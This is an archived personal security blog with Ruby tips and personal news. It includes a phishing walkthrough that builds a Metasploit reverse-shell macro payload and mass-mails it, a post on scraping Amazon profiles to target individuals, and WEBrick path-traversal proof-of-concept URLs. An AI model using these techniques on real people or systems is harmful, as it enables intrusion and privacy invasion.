FreedomCoder » News

El adios a una decada … The good bye to a decade

FreedomCoder — Sun, 30 Jan 2011 19:57:40 +0000

~~English~~:

My last day of this decade. Had an awesome time this past 10 years. I learned a lot of things, I graduated, got married, lived in several different places and cities, hacked many thing, read plenty of code jejejej, etc…

Wow, looking back is both short and so long. All that I prey is to have lots of years ahead of me and even more challenges with lots of fun.

Thanks you all …

Most specially thanks to my lovely Vicky, our families and all those who were part of this GREAT journey.

MUCHAS GRACIAS….

~~Spanish~~:

Mi ultimo dia de esta decada. La verdad que tuve unos fantasticos 10 an~os. Aprendi muchas cosas nuevas, me gradue, me case, vivi en varios lugares en varias ciudades, hackie muchas cosas y lei mas que suficiente codigo ejejeje, etc …

Wow, mirando hacia atras se ve corto y tan largo a la vez. Todo lo que pido/rezo es poder tener muchos an~os mas y muchos desafios nuevos para pasarla bien.

Gracias a todos ..

Especialmente gracias a mi amada Vicky, a nuestras familias y a todos los que han sido parte de esta FANTASTICO viaje llamado vida.

THANKS A LOT ……

Amazon Users’ info Crawler

FreedomCoder — Sun, 11 Jul 2010 14:15:40 +0000

Another weekend and another crawler. This time it is not emails, but nonetheless interesting data from a big gadget store.
Surfing through the site for gadgets, I found that Amazon has some interesting Profile data about it’s users such as location, date of birth, wish list, interested persons list, reviews done to gadgets, etc …

Looking at the URL it was obvious that this could be automated to obtain most, if not the entire list of amazon users. As it turns out a simple Google search with

site:http://www.amazon.com/gp/pdp/profile/

Once I saw that, it was just a matter of writing a small script to harvest all the profiles out of Google and then parse each individual profile for useful information, as it is shown on the screenshot below where it is shows how simple is to gather information such as user location.

Once I had a proof of concept done. I started to think how could I use this data, besides the fact that is a simple info disclosure from the part of amazon.

As you might imagine I’m always on the hunt for new ways to improve ESearchy info gathering. I’ve reached a limit into how many emails or new persons I can easily get for free online. Because of these, lately, I have changed/expanded the searches from adding more persons to adding more detailed information about each individual target. First it was the profiling option on esearchy that searches within each users profile for other social networks, friends/co-workers, photos, or personal sites.

Having this now, I thought that we could expand the information to shopping information offered on the profiles, such as the wish list, the reviewed items –which is almost sure that they own such item–, etc ..

So what if we wanted to target each individual target, we could crawl the entire google results DB one and store that into an offline DB, and or look for a way to search for individual persons from this results. What if we take the persons name obtained from LinkedIn, Spoke, etc and add that to our Google Search parameter.

site:http://www.amazon.com/gp/pdp/profile/ Susan Emery

That will easily return only a few results for which we could use some kind of partial regular expresion with percentage for completeness and take a huge leap into saying that both persons are the same and that those are the times that he/she wants.

So there it goes, more possible useful information that will allow us to generate even better and more targeted attacks against a particular person.

Happy Hacking

Proof of Concept Code:

Client-side Penetration Testing with ESearchy & EMaily

FreedomCoder — Fri, 09 Jul 2010 22:45:55 +0000

General Information

…”our employees are responsable and security aware”….

…”They have admin access, because we trust them “….

….”I thought it was safe to open that file. Robert from IT sent it to me” …

….etc…

Nowadays, computers networks, are “”"”usually”"”" secure. Finding an exploitable remote network vulnerability is getting more and more difficult. This is due to several reasons, such as operating system are safer, patching is slowly becoming a must for all production applications, etc.

But, what about the corporate networks ? Do companies secure their networks the same way they do production servers? The answer is NO. For thousands of motives, workstations are never kept up-to-date, nor properly setup. In top of that, we have the end-users ( including IT admins), an amazing set of people that do amazing tasks, such as manage to infect their computer in less than two days, install all those crazy apps, and/or open all those links that have explicit DO NOT OPEN VIRUS FOUND.

Anyways, to make a story short, hackers, spammers, botnets, and all the “bad” guys are constnatly taken advantage of the ancient weakest link in all type of security; “The human factor“. It does not matter how much you harden a computer, you can count on human ingenuity – …or should I say stupidity… — to find an unthinkable way to open and compromise their workstation.

In addition, nowadays, everybody wants to check their Facebook, LinkedIn, email, twitter, GMail. Basically, it is human nature to be inform ( … gossip ). Attackers know this and they count on people curiosity and need of information to craft their these types of attacks.

Client-side attacks, AKA social enginerring attacks, social engineering penetration tests, basically the not so-new remote exploit trend.

It is worth noting that these type of attacks have existed for a long time, but now due to the tightness of security in networking on one hand and the expansion and rapid grow of social networks on the other hand; it has gained a lot of strength and new types of attacks are appearing daily.

Types of attacks:

emails
websites
Social networks ( Facebook, Orkut, twitter, Linkedin, … )
Forums
Physical ( pendrive, CD, phone, cellphones, ipods, ipads, etc )

Enough of the BS talk let get dirty and talk about how to actually perform a client-side attack.

Info gathering Phase ( Reconnaissance )

Like in any other type of penetration test, we need to gather information. The only difference here is that instead of looking for operating system and software versions and vulnerabilities we need to search information about the company, their employees, their social networks, etc.

I guess that when we are performing a test we would have some limitations with regards to privacy and employess private life, but the true is that a real attacks won’t have such limitations. So the simple rule is the more information you have the better. Everything is relevant information. Everything from sample company documents all they way down to what place some employee went to dinner last week and with whom.

Luckily for us, Mark Zuckerberg ( creator of Facebook ) has made our life much easier convincing people they are supposed to forget abour privacy and share as much information as they can with as much people as they can.

Depending on the type of attack we are performing, the type of data we will need, but most surely we will be needing plenty of email accounts from the company being assess. There are many tools capable of performing OSINT ( Open Source Intelligence) theHarverster, Paterva’s Maltego, et and of course ESearchy.

Esearchy is a small ruby library capable of searching the internet for email addresses and persons. Currently, the supported searching engines are, but not limited to:

Search engines:
- Google
- Bing
- Yahoo,
- AltaVista
Social Engines:
- LinkedIn
- Google Profiles
- Naymz
- Classmantes
- Spoke
Other Engines
- PGP servers
- Usenets
- GoogleGroups Search
- Spider
- LDAP

In addition to that, ESearchy downloads several types of files and searches their contents for emails.

File types supported, but not limited to:

PDF
DOC
DOCX
XLSX
PPTX
ODT
ODP
ODS
ODB
ASN
TXT

Installation:

$> sudo gem sources -a http://gems.github.com $> sudo gem install gemcutter $> sudo gem install esearchy

If you are installing it in backtrack follow the following how-to “Installing ESearchy on Backtrack 4.0”

The application supports several types of searches using the esearchy command and or you can create custom scripts using the esearchy library. Using the tool is simple, for example:

$> esearchy -q @company.com –enable-gmail –enable-gpg
$> esearchy -q @company.com -c “Company Inc” –enable-people –profiling

After this we need to find information about the DNS servers, the mail servers and any other information that we usually do get as part of any penetration test. A good tip, is to check the SMTP server for vulnerabilities such as information disclosures using VRFY, EXPN, etc …

Software and Physical network

Once we have a target list ( emails, names, etc .. ), We need to start performing an assessment on the network from within. One possible way of doing this is by sending one or more rounds of emails using specially crafted html templated emails consisting of several image tags pointing to different ports. and here is when a tool such as EMaily comes in.

Emaily is a command line tool created to send multiple templated emails using several servers at the same time. It contains many templates, but users can create their own templates and populate them as needed. It is worth noting that EMaily is also an expandable ruby library.

This can be automatically generated using EMaily template system as it is shown on the following code snipet, by simply using the %%payload[port 1, ... ,port n]%%

As we can see from the output generated by EMaily this will test egressing rules, obtain information such as operating system, email client used, IP addresses, etc…

Penetration Phase

Once we have obtained enough information about the company’s users and network infrastructure, it is time to concentrate all our efforts in attacking the company using all possible methods. There are many types of ways to compromise an end user. The most common methods are sending emails with certain types of attachments, such as pdf, Word, Excel, PowerPoint, executables, etc. Pretty much anything is possible and allowed.

VBA Attacks

One of the most commons methods to compromise a workstation is through a VBA payload. This is achieved using a word, excel or powerpoint file that contains a malicious script that will generate and execute, most commonly, a reverse shell. ( metasploit, Core Impact, custom built )

It is worth noting that when generating the payload we should use the open port information we got from our information gathering phase, so we are sure we can connect back to our MSF instance.

Sample Metasploit command to generate a reverse tcp vnc inject payload.

> msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.1 V > vbvnc.bas

Once we have the payload we need to add it to a file. Here is where the experience, artist skills come in handy. The more credible the file the higher the chances for an employee to open the document. Usually, it is recommended to search in google, bing, yahoo for documents made or related to the company in question. This docs, should contain information such as logos, speeches and other corporate standards, that will make the attack more credible.

First open the document in question and open the Visual Editor for macros.

After that copy the content of the first part of the .bas script into the editor, save and quit the macro.

The second part “the actual payload” should be stored in the end of the document, if we are using a MS Word document.

It is worth noting, that if we use the latest version of the MSF VBA attack (3.4.x ) we will only be able to use it in Microsoft Word, but with a couple changes, we should be able to add it to Excel as well. Instead of using the payload as paragraphs we can paste then into the macro. Adding as a stream ( as it used to be done ) and or by using chr() method.

…

s = s + chr(38) + chr(72) + chr(53) + chr(65)

s = s + chr(38) + chr(72) + chr(57) + chr(48)

s = s + chr(38) + chr(72) + chr(48) + chr(48)

s = s + chr(38) + chr(72) + chr(48) + chr(51)

s = s + chr(72) + chr(38 + chr(48) + chr(48)

s = s + chr(38)

Once we have this setup Excel setup, it is time to use all the available emails and launch our first round of client-side attacks using EMaily again but this time we should use another template such as an internal email or something that would convince users to open the attached Excel sheet ( I leave that for later .. ).

For example if we want to send emails using servers 1,2,3,4 in blocks of 100 emails and we want to do it all at the same time ( Threaded) with a small scanports that would allow us to know who opened the email, we would have to execute the following command.

> emaily -S server1,server2,server4,server4 -b 100 -T --subject "Quaterly Report" -t templates/q_report.html -l ~/company_emails.csv -a ~/tmp/Q4_Financial_Report.xls --webserver --scanports 80,443

Well, now is time layback, get some mate with alfajores and wait until users start executing the excel payload and we get connection back. After that sky is the limit …. HACK the entire company ….

Happy Hacking !!!!

I’m a P1r4t3 now !

FreedomCoder — Mon, 24 May 2010 14:00:15 +0000

Lately, a lot of things are changing in my life. A month and a half ago one of the things that changed was “the job”.

I’m currently working for IOActive. Last week while I was visiting headquarters. Our official initialization was performed: “After many beers, a Jagermeister shot, and many hot dogs; I became an official IOActive P1r4t3″

Thanks for all the good times pimps and hoouuus !

Another year is in the can! Welcome 29s

FreedomCoder — Sun, 31 Jan 2010 13:35:09 +0000

Yes, today is my b-day. Hence I decided to add a few lines in this “kind of” forgotten blog.
Lately, I being doing plenty of interesting stuff, but haven’t had the time to sit and write about those things.

Here are a few updates.
* ESearchy-NG has a few new features. (Spoke being one of them)

* EMaily is almost finished. I have started testing and I’m looking for people willing to test this buggy version. (ohhh… EMaily is an automated companion tool to send client-side emails to hundred or thousands of people in different servers using customizable templates, etc. )

* Several other researches are on my table slowly developing into interesting tools or projects.

New blog

FreedomCoder — Wed, 05 Aug 2009 01:31:38 +0000

After many nights of searching the internez for a script capable of migrating from Drupal to WordPress, I finally found a script for an old version of Drupal. I had to do some work in order to make it work but after a couple of hours of trial and error I managed to modified and improve to old ruby script.

Now, I have a brand new CMS which I’m still finishing some details, but I hope you find this blog better and more likable than the old one. Comments and questions are accepted.

Enjoy.

I’m back with some Code …

FreedomCoder — Mon, 06 Jul 2009 01:46:17 +0000

Well, hello again, long time since the last post. I went on vacations, work a lot and did some programming. Let’s talk abount the programming part, since it is the most interesting one.

I created a small library called “Esearchy” capable of searching the internet for email addresses. Currently, we the supported search methods are engines such as Google, Bing, Yahoo, PGP servers, GoogleGroups, etc , but I intend to add many more.
Also, the library searches inside .pdf and .txt files for emails addresses and adds them to the list of found accounts.

For now, there are two main ways of performing a search, “the ruby way”
Esearchy.create "domain.com" do |domain| domain.maxhits = 500 domain.search domain.clean {|e| e =~ /<|>/ } domain.save_to_file "~/emails.txt" end

and the more classic way in which users can create an Esearchy objetc and work on it

domain = Esearchy.new :query => "domain.com", :maxhits => 500 domain.search domain.save_to_file "~/emails.txt"

For now , that’s it for now , but keep on tuned for more shitty code ajjajaa

I’m going LOCO on Friday !!!

FreedomCoder — Thu, 02 Apr 2009 00:18:16 +0000

Nos vemos en LocosxRails 2009 … Espero pasarla mas que bien y que a la gente le gusta la charla.

Download & install ruby-1.9.1

FreedomCoder — Tue, 10 Feb 2009 01:32:45 +0000

Viendo que algunos me preguntaban como bajar e instalar ruby 1.9 para probarlo. Aca les dejo un script en bash que baja, descomprime, configura e instala ruby con un prefijo -1.9.1 en el directorio /opt/local (Directorio comunmente usado en osx por macports.)

#!/bin/sh curl ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-p0.tar.gz > /tmp/ruby-1.9.1-p0.tar.gz cd /tmp tar xvf ruby-1.9.1-p0.tar.gz cd ruby-1.9.1-p0 autoconf ./configure --program-suffix=-1.9.1 --prefix=/opt/local make sudo make install

UPDATE: I just added another script to install directly from the svn repository. This is for those crazy people who like to live on the edge.
#!/bin/sh if [ -z "$1" ]; then echo "usage: $0 " echo "Author: Matias Pablo Brutti" echo "Bye " exit fi


echo "This might not compile because it is download straight from"

echo "the svn repository. If it does not work either wait and try"

echo "again later or do your work and check why is not working."

echo "Happy hacking!"
if [ "$1" == install ]; then

	echo "Downloading ruby from the svn repo"

	svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby

	cd ruby

fi
if [ "$1" == update ]; then

	echo "Cleaning last install and updating repo"

	cd ruby

	make clean

	svn update

fi

echo "Configuring && installing ..." autoconf ./configure --program-suffix=-1.9 --prefix=/opt/local make sudo make install

Enjoy.

LugparanaConf 2008

FreedomCoder — Tue, 11 Nov 2008 07:46:49 +0000

Finalmente, me sente a escribir sobre la LugParanaConf 2008.

El Sabado primero de Noviembre se realizo la conferencia de Software Libre en la Universidad Tecnologica Nacional – Facultad Reginal Parana. Gracias a Rodolinux termine dando 3 charlas en el correspondiente orden:

1) Intro a Ruby
2) Ruby Metaprogramming
3) Vulnerabilidades en la Matrix

Dentro de las charlas a destacar encontr? la de Rodolinux
(http://www.rodolinux.com.ar) y otra de Gramos
(http://gastonramos.wordpress.com/), siendo la primera muy filos?fica y psicologica y la otra altamente tecnica.

La conferencia fue todo un ?xito aunque realmente esperaba mas gente. Siendo critico constructivo para ir pensando en LugParanaConf 09, creo que se deber?a haber realizado mucho mas propaganda en tiempo y forma en todas las universidades y colegios t?cnicos de la zona.

Siguiendo la filosof?a de full disclosure, es importante mencionar que la primera charla, fue una peque?a introducci?n a Ruby que hice en el bondi y un rato a la madrugada ( 6 – 8 AM ) cuando llegue a Parana, Asi que pido que sepan comprender y disculparme si contiene errores.
Dicho esto, las otra dos, no. Asi que sientanse libre de hacer comentarios sobre las 3 pero no me maten con la primera.

Saludos y es importante destacar que mis charlas son distribuidas bajo la licencia Creative Commons
Attribution + Noncommercial + ShareAlike (by-nc-sa)

Jornadas Regionales de Software Libre

FreedomCoder — Mon, 25 Aug 2008 21:29:42 +0000

Las CaFeConf y JRSL son peque?os espacios de encuentro con amigos que no suelo ver durante el an~o pero que comparto dia a dia proyectos, ideas, ideales, etc.

Luego Tres (3) dias de mucho Ruby, Software Libre, amigos, cerveza, charlas, keynotes de astronautas e intercambio de ideas en los pasillos, logre –en los tiempos libres– dar un par de charlas.
Aca les dejo los slides de las presentaciones:

* RubyCocoa:

http://www.freedomcoder.com.ar/files/JRSL08/ruby-cocoa.pdf

* Ruby Metraprogramming:

http://www.freedomcoder.com.ar/files/JRSL08/ruby-meta.pdf

* Photos :

http://www.flickr.com/photos/freedomcoder/sets/72157606962173346/

MaximSoft vende productos usados/abiertos/refurbish ?

FreedomCoder — Mon, 21 Apr 2008 23:33:53 +0000

Hola , hoy queria comprarme un Apple Mighty Mouse wireless, busque un poco y vi que el mas economico ( no por mucho ) era el de MaximiSoft.com.ar. Los llame y no enviaban a domicilio. ( Resulto que tenia suerte). Bueno al salir del trabajo decidi ir a comprarlo personalmente, cuando llego le digo:

Yo: Hola, Llame pare comprar el Apple Mighty Mouse Wireless
Vendedor: Si pera que voy a traer a buscar uno.
Luego de unos minutos
Vendedor: Aca esta .
Yo: eh… pero porque no esta en una caja cerrada de Apple
Vendedor: no ahora para importarlos vienen asi.
Yo: mira vos… , lo quiero prender y no tenia pilas
Yo: No tiene pilas ?
Vendedor: No no tiene pilas ya no viene mas con pilas
Yo pensando ( mmmm … esto esta usado , tiene la mugre que se acumula de los dedos) y claramente Apple nunca enviaria algo asi, deben ser los usados o los que vienen con las Apple iMac que no los venden y me quieren vender eso como nuevo.
Vendedor: y lo queres o no ?
Yo: No gracias no compro cosas abiertas/usadas como nuevos y menos a precio de algo nuevo. Ciao

RECOMENDACION: NO les compren nada a MaximSoft, Ademas de esto un amigo, Martin, tuvo problemas con una Macbook Pro.
Mi solucion y no es para hacer propaganda ni nada fue ir a otra casa, Alfa Uno Macstore y lo tenian 5 dolares mas caro pero claramente como corresponde con caja sellada, con las pilas de lithium y con manuales. Lo mismo creo que es Macstation pero no tienen stock y es unos 30 USD mas caros.

NO SE DEJEN CAGAR POR LOS LADRONES QUE PIENSAN QUE PORQUE ESTAMOS EN ARGENTINA SOMOS TODOS INDIOS Y NO SABEMOS NADA. !!! ESPERO QUE APPLE USA SE ENTERE Y LES SAQUEN LA AUTHORIZATION PARA SER RESELLERS.

Slds.
Digg it : http://digg.com/apple/MaximSoft_com_ar_vende_productos_usados_abiertos_refurbish

Finally mod_rails !

FreedomCoder — Sun, 13 Apr 2008 15:06:38 +0000

Extrated from mod_rails Homepage:
“Phusion Passenger ? a.k.a. mod_rails ? makes deployment of applications built on the revolutionary Ruby on Rails web framework a breeze. It follows the usual Ruby on Rails conventions, such as ?Don?t-Repeat-Yourself?.”

The most important thing, installation:

1. Open a terminal, and type:
gem install passenger
2. Type:
passenger-install-apache2-module
And follow the instructions.

Well, enjoy and let the party begin with Apache and Rails. Hopefully, my provider Dreamhost will be deploying this soon to production.

Vmware Workstation 6.5 with unity in GNU/Linux

FreedomCoder — Tue, 08 Apr 2008 18:28:23 +0000

Finally, Vmware has included unity to Vmware workstation for Linux, for now it is only available in the upcoming 6.5 version Public beta. I decided to download it and give it a try since I use vmware a lot I and would love that integration that I have with vmware fusion and parallels in my mac.
Honestly, when I installed vmware I was a little sceptic (brit. for skeptic) about how it will run on Compiz Fusion. Once I installed I was amazed by how well it run, although, my skeptisism was not unfounded since the refresh of the windows still is a little arghhh . But the windows have all the effects and gnome recognizes them as windows, as we can appreciate in the screenshot below. Anyway, big ups for Vmware, they are finally pushing a little of that nice look and feel that they have in the mac to the Linux world.
Even though we are geeks we still like our desktop to look nice. ( mmm thats why I use osx as my desktop ? nahh I love my Compiz Fusion effects no OS has that yet.)

ENSO

FreedomCoder — Wed, 02 Apr 2008 15:18:38 +0000

while surfing the web I came across a product called ENSO from humanized.com , even though the video is kind of corny the actual product seams really interesting and promising. As a macosx + quicksilver user, at first I though it was just a launcher for windows, but after watching the video as a whole I realize that enso has a much more wide, productive and interesting group of apps. The fact that you can pretty much do every task you want and really fast, makes it a necessary tool to be efficient and productive. Well, anyone interested in the apps, I would recommend you to watch the video and give it try. I will continue doing so in my windows machine for a couple of days and see if it is as good as it is now. The only bad thing so far, not linux nor macosx version , which are my main operating systems.

Enjoy.

Download enso apps
- Enso Launcher
- Enso Words

Ayudemos al campo, ayudemos a la Argentina !!

FreedomCoder — Sun, 30 Mar 2008 02:49:03 +0000

No tiene nada que ver con la informatica , pero tiene que ver con el dia a dia de mi vida y queria pedirles a todos aquellos que quieran a apoyar a los pequenos y mediano productores de campo en la lucha contra la suba de las retenciones y el constante abuso de nuestra querida presidenta para con todos. Porque primero comiezan por el campo pero si la dejamos seguir , pronto seran nuestros impuestos , ganancias, etc … Esto no es solo una protesta del campo es una protesta de la argentina. Si estas de acuerdo en lo que plantea el campo pone este banner en tu sitio, pasalo en tus emails , etc.

Mucha gente me ha preguntado como agregar el banner en sus sitios asi que aca les dejo un ejemplo de como ponerlo.

Saludos

UPDATE: for those english readers that check this blog, this article will give you an accurate explanation of what is going on in Argentina.
http://online.wsj.com/article/SB120692466040375723.html

Metasploit 3.1′s WEBrick also vulnerable to file access vulnerability

FreedomCoder — Wed, 05 Mar 2008 17:34:46 +0000

As expected Metasploit 3.1 is also vulnerable to the File access vulnerability found in WebRick. Even though this is not a vulnerability in metasploit iself, due to the fact that Metasploit’s Web version runs Rails on top of Webrick, this latter is vulnerable so it affects anyone running metasploit’s “msfweb”. To be sure, I just updated to the latest svn version of metasploit and Webrick is still vulnerable. This is not critical at all, Luckily, it is only serving on the localhost, otherwise it will suck real bad. Just to be careful and make sure that your msfweb is not accesable from the network and keep your update up to date , I guess there will be a fix soon.

Proof of concept:

http://localhost:55555/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini

Post with original Webrick’s bug: http://www.freedomcoder.com.ar/node/113
Credit to Digital Security Research Group (http://dsec.ru/) for disclosing Webricks’s original problem to Ruby Security Team.

WEBrick’s file access vulnerability

FreedomCoder — Mon, 03 Mar 2008 15:34:29 +0000

WEBrick, a standard library of Ruby to implement HTTP servers, has file access vulnerability.
Impact

The following programs are vulnerable.

1. Programs that publish files using WEBrick::HTTPServer.new with the ocumentRoot option
2. Programs that publish files using WEBrick::HTTPServlet::FileHandler

Affected systems are:

1. Systems that accept backslash (\) as a path separator, such as Windows.
2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X.

This vulnerability has the following impacts.

Attacker can access private files by sending a url with url encoded backslash (\). This exploit works only on systems that accept backslash as a path separator.

Example:

http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini

2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [".ht*", "*~"]). This exploit works only on systems that use case insensitive filesystems.

Vulnerable versions

1.8 series

* 1.8.4 and all prior versions
* 1.8.5-p114 and all prior versions
* 1.8.6-p113 and all prior versions

1.9 series

* 1.9.0-1 and all prior versions

Solution

1.8 series
Please upgrade to 1.8.5-p115 or 1.8.6-p114.

* ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.5-p115.tar.gz (md5sum: 20ca6cc87eb077296806412feaac0356)
* ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p114.tar.gz (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3)

1.9 series
Please apply the following patch to lib/webrick/httpservlet/filehandler.rb.

* ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.0-1-webrick-vulnerability-fix.diff (md5sum: b7b58aed40fa1609a67f53cfd3a13257)

Please note that a package that corrects this weakness may already be available through your package management software.
Credit

Credit to Digital Security Research Group (http://dsec.ru/) for disclosing the problem to Ruby Security Team.

Active YouTube

FreedomCoder — Fri, 22 Feb 2008 00:52:57 +0000

La verdad que encontre esto y me parecio re intersante un active youtube

Para instalarlo :
gem install active_youtube

Aca el ejemplito para pegarle un vistaso :

#### Video ## search for videos on 'ruby' search = Youtube::Video.find(:first, :params => {:vq => 'ruby', :"max-results" => '5'}) puts search.entry.length


  ## video information of id = ZTUVgYoeN_o

  vid = Youtube::Video.find("ZTUVgYoeN_o")

  puts vid.group.content[0].url
  ## video comments

  comments = Youtube::Video.find_custom("ZTUVgYoeN_o").get(:comments)

  puts comments.entry[0].link[2].href
  ## searching with category/tags

  results = Youtube::Video.search_by_tags("Comedy")

  puts results[0].entry[0].title
#### STANDARDFEED

  ## retrieving standard feeds

  most_viewed = Youtube::Standardfeed.find(:most_viewed, :params => {:time => 'today'})

  puts most_viewed.entry[0].group.content[0].url
#### USER

  ## user's profile - guthrie

  user_profile = Youtube::User.find("guthrie")

  puts user_profile.link[1].href

#### PLAYLIST ## get playlist - multiple elements in playlist playlist = Youtube::Playlist.find("EBF5D6DC4589D7B7") puts playlist.entry[0].group.content[0].url

MacOSX 10.5.2 is out

FreedomCoder — Mon, 11 Feb 2008 21:44:15 +0000

Apple has released the Mac OS X 10.5.2 Leopard updates. The 180MB download is now available via Software Update, and a restart is required after installation:

The 10.5.2 Update is recommended for all users running Mac OS X Leopard and includes general operating system fixes that enhance the stability, compatibility and security of your Mac.

For detailed information on this update, please visit this website: http://docs.info.apple.com/article.html?artnum=307109.
For detailed information on security updates, please visit this website: http://docs.info.apple.com/article.html?artnum=61798.
A number of improvements are detailed, but some highlights are listed here:

- Airport: Improves connection reliability and stability
- Back to my Mac: Adds support for more third-party routers, as detailed in this article.
- Dock: Updates Stacks with a List view option, a Folder view option, and an updated background for Grid view.
- Desktop: Addresses legibility issues with the menu bar with an option to turn off transparency in Desktop & Screen Saver preferences.
- Desktop: Adjusts menus to be slightly-less translucent overall.
- iSync: Adds support for Samsung D600E and D900i phones.
- RAW Image: Adds RAW image support for several cameras, as detailed in this article.
- Safari: Addresses issues with Safari reliably resolving certain domains.
- Time Machine: Adds a menu bar option for accessing Time Machine features (the menu extra can be enabled in Time Machine preferences).
- Time Machine: Improves backup reliability when computer name contains slash or non-ASCII characters.
- Time Machine: Addresses issues in which some external drives are not recognized by Time Machine.

Please add undocumented issues in the Mac OS X 10.5.2 Fixes, Bugs and Problems guide.